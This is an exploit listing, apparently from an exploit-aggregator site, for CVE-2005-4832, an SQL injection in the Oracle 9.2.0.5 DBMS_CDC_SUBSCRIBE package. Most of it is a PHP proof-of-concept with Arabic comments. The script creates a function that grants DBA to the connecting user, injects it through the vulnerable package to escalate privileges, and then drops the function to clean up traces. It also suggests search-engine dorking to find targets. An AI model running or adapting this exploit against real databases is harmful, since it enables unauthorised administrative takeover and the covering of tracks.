Share
## https://sploitus.com/exploit?id=PACKETSTORM:215533
=============================================================================================================================================
    | # Title     : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.oracle.com/                                                                                                     |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: SQL injection vulnerability in Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package.
    
       (Related : https://packetstorm.news/files/id/180720/ Linked CVE numbers: CVE-2005-4832 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 3 + 4 + 5 + 6 + 7
    
    [+] PayLoad :
    
    <?php
    // إعداد الاتصال بقاعدة بيانات Oracle
    $host = "localhost"; // استبدلها بعنوان السيرفر
    $port = "1521"; // منفذ Oracle
    $sid = "ORCL"; // معرف قاعدة البيانات
    $user = "victim_user"; // المستخدم المستهدف
    $password = "victim_password"; // كلمة المرور
    
    try {
        $dsn = "oci:dbname=$host:$port/$sid;charset=UTF8";
        $conn = new PDO($dsn, $user, $password);
        $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    
        echo "[+] الاتصال بقاعدة البيانات ناجح!\n";
    
        // اسم دالة عشوائية
        $func_name = "h4ck" . rand(1000, 9999);
    
        // إنشاء دالة تقوم بتنفيذ أوامر SQL بامتيازات عالية
        $function = "
            CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2
            AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;
            BEGIN
            EXECUTE IMMEDIATE 'GRANT DBA TO $user';
            RETURN '';
            END;
        ";
    
        // استعلام الحقن
        $injection = "
            BEGIN
                sys.dbms_cdc_subscribe.activate_subscription('''||$func_name()||''');
            END;
        ";
    
        // حذف الدالة بعد التنفيذ
        $clean = "DROP FUNCTION $func_name";
    
        echo "[+] إرسال الدالة الضارة...\n";
        $conn->exec($function);
    
        try {
            echo "[+] محاولة تنفيذ حقن SQL...\n";
            $conn->exec($injection);
        } catch (Exception $e) {
            echo "[-] فشل تنفيذ الحقن: " . $e->getMessage() . "\n";
        } finally {
            echo "[+] تنظيف الآثار...\n";
            $conn->exec($clean);
        }
    
        echo "[+] انتهى التنفيذ.\n";
    } catch (PDOException $e) {
        die("[-] خطأ في الاتصال: " . $e->getMessage() . "\n");
    }
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================